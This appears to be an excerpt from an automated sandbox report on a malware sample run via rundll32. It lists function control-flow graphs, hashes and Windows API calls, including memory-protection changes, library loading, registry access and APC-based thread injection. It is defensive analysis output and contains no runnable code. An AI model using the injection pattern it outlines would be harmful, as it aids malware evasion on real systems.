208 1572393f5b3-1572393f5bb 201->208 206 1572393f5ec-1572393f5f4 202->206 207 1572393f5f9-1572393f608 202->207 206->89 209 1572393f60e-1572393f644 call 15723943bc8 207->209 210 1572393f8d1-1572393f8d8 207->210 208->89 230 1572393f646-1572393f64d 209->230 231 1572393f651-1572393f654 209->231 212 1572393f8de-1572393f902 call 15723957004 210->212 213 1572393fa60-1572393fa69 210->213 222 1572393f908-1572393f928 call 15723958678 212->222 223 1572393f9a5-1572393f9c6 call 15723957004 212->223 213->97 215 1572393fa6f-1572393fa74 213->215 218 1572393fae6-1572393fb14 call 157239526bc 215->218 219 1572393fa76-1572393fa79 215->219 218->206 232 1572393fb1a-1572393fb1c 218->232 224 1572393fa8b-1572393faa8 219->224 225 1572393fa7b-1572393fa85 219->225 222->223 239 1572393f92a-1572393f937 222->239 223->213 238 1572393f9cc-1572393f9e9 call 15723958678 223->238 224->218 241 1572393faaa-1572393fadc 224->241 225->224 230->231 231->89 236 1572393f65a-1572393f727 call 15723956b44 * 4 231->236 232->97 263 1572393f729-1572393f730 236->263 264 1572393f795-1572393f798 236->264 238->213 249 1572393f9eb-1572393f9f8 238->249 243 1572393f939-1572393f97e call 15723950c58 call 157239548d4 239->243 244 1572393f993-1572393f99d 239->244 241->218 243->244 266 1572393f980-1572393f98e call 1572394f5d8 243->266 244->223 252 1572393fa4e-1572393fa58 249->252 253 1572393f9fa-1572393fa40 call 15723950c58 call 157239548d4 249->253 252->213 253->252 274 1572393fa42-1572393fa49 call 1572394b24c 253->274 263->264 269 1572393f732-1572393f74d 263->269 264->89 268 1572393f79e-1572393f7a5 264->268 266->244 272 1572393f7bc-1572393f7db 268->272 273 1572393f7a7-1572393f7b6 268->273 278 1572393f757-1572393f783 call 157239526bc 269->278 279 1572393f74f-1572393f755 269->279 280 1572393f81b-1572393f85b 272->280 281 1572393f7dd-1572393f816 call 1572393fe20 272->281 273->272 274->252 278->264 286 1572393f785-1572393f78b 278->286 287 1572393f793 279->287 289 1572393f85d-1572393f87a call 157239526bc 280->289 290 1572393f89e-1572393f8a4 280->290 281->280 286->287 287->264 295 1572393f87c-1572393f881 289->295 296 1572393f883-1572393f89c 289->296 297 1572393f8a6-1572393f8a9 290->297 295->297 296->297 297->89 298 1572393f8af-1572393f8ba 297->298 298->213 300 1572393f8c0-1572393f8cc call 15723936274 298->300 300->213
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateUser$MutexNameQueueThread
                                                          • String ID:
                                                          • API String ID: 2503873790-0
                                                          • Opcode ID: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                                                          • Instruction ID: 28a96bec220ae877eaa956faf93b0661cf0a5e2c925fc40efcc265e866fa8a65
                                                          • Opcode Fuzzy Hash: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                                                          • Instruction Fuzzy Hash: 6172B37561DB08CFE768EF28EC8A6A573E1F795305F20452ED48BC71A1DE3898478B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000001572396F002 Relevance: 3.4, APIs: 2, Instructions: 357nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 356 1572396f002-1572396f06b 358 1572396f366-1572396f37e 356->358 359 1572396f071-1572396f08e 356->359 367 1572396f381-1572396f393 358->367 360 1572396f094-1572396f09d 359->360 361 1572396f260-1572396f2ab NtProtectVirtualMemory 359->361 360->361 365 1572396f0a3-1572396f0ae 360->365 363 1572396f345-1572396f347 361->363 364 1572396f2b1-1572396f2b2 361->364 366 1572396f349-1572396f364 363->366 363->367 368 1572396f2b6-1572396f2b8 364->368 369 1572396f0b6-1572396f0c2 365->369 366->367 368->367 370 1572396f2be-1572396f2c2 368->370 371 1572396f0c4-1572396f0c5 369->371 372 1572396f0e0-1572396f10d 369->372 374 1572396f2da-1572396f2de 370->374 375 1572396f2c4-1572396f2d8 370->375 376 1572396f0c7-1572396f0de 371->376 381 1572396f113-1572396f124 372->381 382 1572396f251-1572396f252 372->382 378 1572396f2f6-1572396f2f7 374->378 379 1572396f2e0-1572396f2f4 374->379 377 1572396f2f9-1572396f33f NtProtectVirtualMemory 375->377 376->372 376->376 377->363 377->368 378->377 379->377 383 1572396f13a-1572396f156 381->383 384 1572396f126-1572396f12b 381->384 385 1572396f257-1572396f25a 382->385 387 1572396f22c-1572396f22f 383->387 388 1572396f15c-1572396f19a 383->388 384->383 386 1572396f12d-1572396f135 384->386 385->361 385->367 389 1572396f235-1572396f249 386->389 387->367 387->389 394 1572396f19c-1572396f1a4 388->394 395 1572396f1c3-1572396f1e3 388->395 392 1572396f0b0-1572396f0b1 389->392 393 1572396f24f 389->393 392->369 393->385 396 1572396f1a6-1572396f1ad 394->396 397 1572396f1af-1572396f1c0 394->397 399 1572396f1e8-1572396f1ea 395->399 400 1572396f1e5 395->400 396->396 396->397 397->395 401 1572396f21e-1572396f227 399->401 402 1572396f1ec-1572396f20e 399->402 400->399 401->387 402->387 403 1572396f210-1572396f219 402->403 403->388
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.471281896.000001572396F000.00000040.80000000.00040000.00000000.sdmp, Offset: 000001572396F000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_1572396f000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 763bc2c334054d482c1953eee1de521cfec9c824c408ccc28d3490dde02b6101
                                                          • Instruction ID: 5a82c0069041076172cc768f3d3f0b42f918df4f2b5654fb8f6575dad553b4c5
                                                          • Opcode Fuzzy Hash: 763bc2c334054d482c1953eee1de521cfec9c824c408ccc28d3490dde02b6101
                                                          • Instruction Fuzzy Hash: 2BB1E53121DF888FD764DE18DC86BE5B3E1FB96305F54456DD4CBCB282D634A4468B42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000001572393B4B8 Relevance: 1.8, APIs: 1, Instructions: 292memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 502 1572393b4b8-1572393b4ee 503 1572393b4fa-1572393b4fb 502->503 504 1572393b4f0-1572393b4f8 502->504 505 1572393b4fd-1572393b522 HeapCreate 503->505 504->505 507 1572393b52c-1572393b556 505->507 508 1572393b524-1572393b527 505->508 513 1572393b558-1572393b560 507->513 514 1572393b5b7-1572393b5bd 507->514 509 1572393b73f-1572393b742 508->509 511 1572393b79d-1572393b7b6 509->511 512 1572393b744-1572393b76c 509->512 512->511 518 1572393b76e-1572393b785 512->518 520 1572393b562-1572393b56b 513->520 521 1572393b56f 513->521 519 1572393b5bf-1572393b5c1 514->519 518->511 533 1572393b787-1572393b792 518->533 519->509 522 1572393b5c7-1572393b5e3 call 15723954958 519->522 523 1572393b56d 520->523 524 1572393b571-1572393b5ae 520->524 521->524 526 1572393b5b0-1572393b5b5 521->526 531 1572393b5e9-1572393b628 522->531 532 1572393b6f8-1572393b6fa 522->532 523->521 524->519 526->519 539 1572393b62e-1572393b641 call 1572393b7b8 531->539 540 1572393b6eb 531->540 532->509 534 1572393b6fc-1572393b714 call 1572395c930 532->534 533->511 535 1572393b794-1572393b79c 533->535 534->509 545 1572393b716-1572393b738 call 1572393495c call 1572393bc00 534->545 535->511 548 1572393b6b1 539->548 549 1572393b643-1572393b654 539->549 543 1572393b6f0-1572393b6f1 540->543 543->532 554 1572393b73d 545->554 551 1572393b6b8-1572393b6c0 548->551 552 1572393b656-1572393b6a7 call 15723950c58 549->552 555 1572393b6c2-1572393b6d2 551->555 556 1572393b6d4-1572393b6e9 551->556 560 1572393b6a9-1572393b6af 552->560 554->509 555->543 556->543 560->551
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                                                          • Instruction ID: 14f10dc935aff8035190e4558b066a715e17e9d37226b8c86287397b9ed6b3d7
                                                          • Opcode Fuzzy Hash: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                                                          • Instruction Fuzzy Hash: 05919470618E098FF768EF28EC997A933D5EB95316F204129D58BC72A1EE78D8428741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000001572395A148 Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                                                          • Instruction ID: 5a087ab223cd0308c069168d9260a046d9ed34d642264bfdaac4664796da2ce9
                                                          • Opcode Fuzzy Hash: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                                                          • Instruction Fuzzy Hash: 4A014F30218E0D8FEB95EF68E9C9B6673E4FBA930AF40016EA449C7194D634D885CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000015723931930 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptorlstrcmp
                                                          • String ID:
                                                          • API String ID: 735288309-3916222277
                                                          • Opcode ID: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                                                          • Instruction ID: 89117256aeea8e6249316254b9c3c7be9bb7184c8565ff289f3daa7550330b0c
                                                          • Opcode Fuzzy Hash: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                                                          • Instruction Fuzzy Hash: C651297161CE448BE7287E18AC8B2B973D5E3CA316F14013ED9DAC72E1D9349C534B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000001572394D43C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0000015723957004: RegCreateKeyA.ADVAPI32(?,?,?,0000015723959153), ref: 0000015723957027
                                                          • RegQueryValueExA.KERNELBASE ref: 000001572394D4B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateQueryValue
                                                          • String ID: ($(
                                                          • API String ID: 2711935003-222463766
                                                          • Opcode ID: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                                                          • Instruction ID: a126a6aaf64304dbf06f302a7acc19670d3cb0f7bf0a4b850267ea67042b2d09
                                                          • Opcode Fuzzy Hash: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                                                          • Instruction Fuzzy Hash: 7541A274618B48CFF748DF18EC996A673E1F799309F00812AD58AC32A1DF78DA45CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000001572395E2C4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 304 1572395e2c4-1572395e341 305 1572395e368-1572395e394 304->305 306 1572395e343-1572395e363 304->306 307 1572395e3aa-1572395e3ae 305->307 308 1572395e396-1572395e3a8 305->308 311 1572395e59a-1572395e5b1 306->311 310 1572395e3b2-1572395e3be 307->310 308->310 312 1572395e3dc-1572395e3df 310->312 313 1572395e3c0-1572395e3cf 310->313 314 1572395e3e5-1572395e3e8 312->314 315 1572395e4b3-1572395e4bb 312->315 323 1572395e3d5-1572395e3d6 313->323 324 1572395e570-1572395e57a 313->324 317 1572395e3fc-1572395e40d LoadLibraryA 314->317 318 1572395e3ea-1572395e3fa 314->318 319 1572395e4bd-1572395e4ca 315->319 320 1572395e4cc-1572395e4cf 315->320 325 1572395e467-1572395e471 317->325 326 1572395e40f-1572395e423 317->326 318->317 318->325 319->320 321 1572395e56c-1572395e56d 320->321 322 1572395e4d5-1572395e4d8 320->322 321->324 327 1572395e4da-1572395e4dd 322->327 328 1572395e503-1572395e517 322->328 323->312 331 1572395e57c-1572395e591 324->331 332 1572395e597-1572395e598 324->332 329 1572395e4a3-1572395e4a4 325->329 330 1572395e473-1572395e477 325->330 341 1572395e437-1572395e462 326->341 342 1572395e425-1572395e435 326->342 327->328 335 1572395e4df-1572395e4ea 327->335 328->321 345 1572395e519-1572395e52d 328->345 336 1572395e4ac-1572395e4ad 329->336 330->336 337 1572395e479-1572395e48a 330->337 331->332 332->311 335->328 339 1572395e4ec-1572395e4f1 335->339 336->315 337->336 348 1572395e48c-1572395e4a1 337->348 339->328 343 1572395e4f3-1572395e4f8 339->343 341->311 342->325 342->341 343->328 347 1572395e4fa-1572395e501 343->347 351 1572395e53c-1572395e53f 345->351 352 1572395e52f-1572395e53a 345->352 347->321 347->328 348->336 351->321 353 1572395e541-1572395e568 351->353 352->351 353->321
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: H
                                                          • API String ID: 1029625771-2852464175
                                                          • Opcode ID: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                                                          • Instruction ID: 9f994a2854622c6634b3d3e61be1a96076b973d50986e480f11420a4e0208a0b
                                                          • Opcode Fuzzy Hash: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                                                          • Instruction Fuzzy Hash: F1A16130508F0A8FEB55DF58E88D7A677E5FB99316F00462ED489C71A1EB35D881CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000015723931B38 Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                                                          • Instruction ID: 492ffcd243a2ccc3aff9afc1226362d1968b99c25f3c8123a6a5d17a211c8c39
                                                          • Opcode Fuzzy Hash: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                                                          • Instruction Fuzzy Hash: 37615070618F098FE754EF19E88A765B7E1FB99305F10056EE48EC72A1DB34E941CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000001572393BC00 Relevance: 3.2, APIs: 2, Instructions: 152COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ContinueHandlerVectored
                                                          • String ID:
                                                          • API String ID: 3758255415-0
                                                          • Opcode ID: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                                                          • Instruction ID: bea7c887ae4e6e82779e38123311d6774180bd06d4a1ad54fbf3b857c2cb3c5d
                                                          • Opcode Fuzzy Hash: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                                                          • Instruction Fuzzy Hash: 7751A471608E05CFFBA4EF28AC497BA77D1EBD9306F1541299496C72E1DB7CC9028B41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000015723958678 Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 475 15723958678-157239586c0 RegQueryValueExA 476 15723958720-15723958743 RegCloseKey 475->476 477 157239586c2-157239586db 475->477 479 1572395871b 477->479 480 157239586dd-157239586ff 477->480 479->476 482 15723958707-15723958719 480->482 483 15723958701-15723958705 480->483 482->476 483->476
                                                          APIs
                                                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,0000015723941105), ref: 00000157239586B6
                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,0000015723941105), ref: 0000015723958723
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                                                          • Instruction ID: fb968defe4d319f50bcb35e781735560a44e74386416153da676806a9ee9d0d3
                                                          • Opcode Fuzzy Hash: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                                                          • Instruction Fuzzy Hash: AB214F3061CA088FE758EF2CE84D666B7E1FB98355F10446EE48AC3661DB34E981CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000015723957004 Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateOpen
                                                          • String ID:
                                                          • API String ID: 436179556-0
                                                          • Opcode ID: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                                                          • Instruction ID: 34e989ad331575051bd1bbd48da416aacabcd502fcbc59687bac9dea9766eee7
                                                          • Opcode Fuzzy Hash: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                                                          • Instruction Fuzzy Hash: 4E11A53160CA088FDB94DB5C9449769B7E1EBE9355F10046EE989C32A1DA75C9848B42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000157239526BC Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 495 157239526bc-157239526f8 CreateThread 496 157239526fa-1572395270b QueueUserAPC 495->496 497 15723952733-15723952745 495->497 496->497 498 1572395270d-1572395272b 496->498 498->497
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateQueueThreadUser
                                                          • String ID:
                                                          • API String ID: 3600083758-0
                                                          • Opcode ID: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                                                          • Instruction ID: 462b30ac46ea73e02f822ad1b8a856a40ee8a286424e6134db79524e17d6b2e3
                                                          • Opcode Fuzzy Hash: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                                                          • Instruction Fuzzy Hash: 68018030718E088FEB84EFADA85D729B7E2E7A8312F14406AE409C3260CF38DC41C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000015723954EB8 Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                                                          • Instruction ID: f7ff8b0848fab43b29071d6779f3dde1ba9386a04deab1fd44f283abe6e6d22f
                                                          • Opcode Fuzzy Hash: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                                                          • Instruction Fuzzy Hash: 47616A3161CE05DFE794EF28E88A6A573E0FB99315F50456EE88EC7291DB34E8418BC1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000001572394B4B0 Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptor
                                                          • String ID:
                                                          • API String ID: 3203483114-0
                                                          • Opcode ID: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                                                          • Instruction ID: ee46c951fc4133722e4307caa49cfff33df05ebe13be847f564fa0fa556decef
                                                          • Opcode Fuzzy Hash: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                                                          • Instruction Fuzzy Hash: EA41AE30658E1C8FFB54EF68EC8AAE5B3D1F79A315F504519E08ACB2A1D624D845C781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000001572393495C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 633 1572393495c-1572393497f 634 157239349c8-157239349ca 633->634 635 15723934981-157239349c6 633->635 636 157239349cc-157239349e0 634->636 637 157239349e6-157239349e9 634->637 635->634 638 15723934a0e-15723934a21 635->638 636->637 637->638 639 157239349eb-15723934a03 637->639 639->638 644 15723934a05-15723934a08 FindCloseChangeNotification 639->644 644->638
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                                                          • Instruction ID: e1b77489caf1832c0a66fa986bedf53ee265f4bf8223f11679954aec4478f16a
                                                          • Opcode Fuzzy Hash: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                                                          • Instruction Fuzzy Hash: A621593120CF498FEB95EF28D889B6A77E4FBE9305F11052DE54AC72A0DB38D9448B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0000015723957340 Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.469336606.0000015723931000.00000020.80000000.00040000.00000000.sdmp, Offset: 0000015723931000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_15723931000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                                                          • Instruction ID: bb27cc44921f75a905eb0cb73b6a71ee64e31b77565243a0265a977276a5cb3b
                                                          • Opcode Fuzzy Hash: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                                                          • Instruction Fuzzy Hash: 8811753160CB098FEB54EF58B849565B7E5EB98311F00453EECCAC7285DE70D9458786
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%